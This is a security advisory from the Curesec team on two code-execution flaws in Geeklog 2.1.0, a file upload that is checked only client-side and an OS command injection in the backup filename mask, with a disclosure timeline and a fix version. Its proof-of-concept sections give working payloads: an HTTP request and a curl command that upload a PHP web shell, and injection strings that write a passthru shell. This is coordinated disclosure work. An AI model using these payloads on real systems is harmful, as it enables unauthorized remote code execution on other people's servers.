Geeklog 2.1.0: Code Execution
Date: 2015-12-02 10:52:27
Security Advisory – Curesec Research Team
1. Introduction
| Affected Product: |
Geeklog 2.1.0 |
| Fixed in: |
2.1.1b3 |
| Fixed Version Link: |
https://www.geeklog.net/filemgmt/visit.php/1156 |
| Vendor Contact: |
geeklog-security@lists.geeklog.net |
| Vulnerability Type: |
Code Execution |
| Remote Exploitable: |
Yes |
| Reported to vendor: |
09/29/2015 |
| Disclosed to public: |
12/02/2015 |
| Release mode: |
Coordinated release |
| CVE: |
requested, but not assigned |
| Credits |
Tim Coen of curesec GmbH |
2. Overview
The admin area of Geeklog suffers from two vulnerabilities that can lead to code execution: OS Command Injection and Upload of Files with Dangerous Type.
The arbitrary file upload is already fixed in the beta version geeklog-2.1.1b1, the OS command injection in version 2.1.1b3.
3. Upload of Files with Dangerous Type
CVSS
High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C
Description
When uploading a file, the file type check is performed only client-side. An attacker can easily bypass this check and thus upload files of dangerous types, such as PHP files.
To upload files, an attacker needs a registered user that is in the group "Filemanager Admin".
Proof of Concept
POST /geeklog-2.1.0/public_html/filemanager/connectors/php/filemanager.php HTTP/1.1
Host: localhost
X-Requested-With: XMLHttpRequest
Content-Length: 761
Content-Type: multipart/form-data; boundary=---------------------------10717364298700964751730232773
Cookie: [cookies]
-----------------------------10717364298700964751730232773
Content-Disposition: form-data; name="mode"
add
-----------------------------10717364298700964751730232773
Content-Disposition: form-data; name="currentpath"
/var/www/geeklog-2.1.0/public_html/images/
-----------------------------10717364298700964751730232773
Content-Disposition: form-data; name="filepath"
test.png
-----------------------------10717364298700964751730232773
Content-Disposition: form-data; name="newfile"; filename="shell.php"
Content-Type: image/png
<?php passthru($_GET['x'])
-----------------------------10717364298700964751730232773
Content-Disposition: form-data; name="upload"
Upload
-----------------------------10717364298700964751730232773--
As curl command:
curl -i -s -k -X 'POST' \
-H 'Content-Type: multipart/form-data; boundary=---------------------------10717364298700964751730232773' \
-b 'gl_session=838973868; geeklog=2; password=18bdbd240593b81a5239285a1f56283b4ae20648;' \
--data-binary $'-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"mode\"\x0d\x0a\x0d\x0aadd\x0d\x0a-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"currentpath\"\x0d\x0a\x0d\x0a/var/www/geeklog-2.1.0/public_html/images/\x0d\x0a-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"filepath\"\x0d\x0a\x0d\x0atest.png\x0d\x0a-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"newfile\"; filename=\"shell.php\"\x0d\x0aContent-Type: image/png\x0d\x0a\x0d\x0a<?php passthru($_GET[\'x\'])\x0d\x0a-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"upload\"\x0d\x0a\x0d\x0aUpload\x0d\x0a-----------------------------10717364298700964751730232773--\x0d\x0a' \
'http://localhost/geeklog-2.1.0/public_html/filemanager/connectors/php/filemanager.php'
4. OS Command Injection
CVSS
High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C
Description
When performing a database backup, various settings are passed unsanitized to exec, leading to code execution.
To exploit this issue, an attacker needs a registered user that is in the group "Root".
Proof of Concept
1. Change "Backup File Name Mask" in http://localhost/geeklog-2.1.0/public_html/admin/configuration.php?tab-5 to:
geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo "<?php passthru(\$_GET['x']);" > shell.php;"
2. Perform database backup here:
http://localhost/geeklog-2.1.0/public_html/admin/database.php
The injected commands will be executed.
In the beta version geeklog-2.1.1b1, less-than is filtered out, but OS command injection is still possible, including the creation of a PHP shell by appending the injected PHP code to an existing PHP file without closing tags:
geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo "passthru(\$_GET['x']);" >> ../filemanager/connectors/php/inc/wideimage/lib/Font/PS.php;"
Code
/admin/database.php
function dobackup()
{
[...]
if (!empty($_CONF['mysqldump_filename_mask'])) {
$filename_mask = strftime($_CONF['mysqldump_filename_mask']);
}
[...]
$backupfile = $_CONF['backup_path'] . $filename_mask;
[...]
$command .= " $_DB_name > \"$backupfile\"";
[...]
if ($canExec) {
exec($command);
5. Solution
To mitigate this issue please upgrade at least to version 2.1.1b3:
https://www.geeklog.net/filemgmt/visit.php/1156
Please note that a newer version might already be available.
6. Report Timeline
| 09/29/2015 |
Informed Vendor about Issue (no reply) |
| 10/21/2015 |
Reminded Vendor of Disclosure Date |
| 10/21/2015 |
Vendor asks for an additional two weeks for testing |
| 11/17/2015 |
CVE Requested (no reply) |
| 11/17/2015 |
Reminded Vendor of disclosure date |
| 11/17/2015 |
Vendor points to beta version and announces release |
| 11/24/2015 |
Informed Vendor of insufficient fix in beta |
| 11/30/2015 |
Vendor releases fix |
| 12/02/2015 |
Disclosed to public |
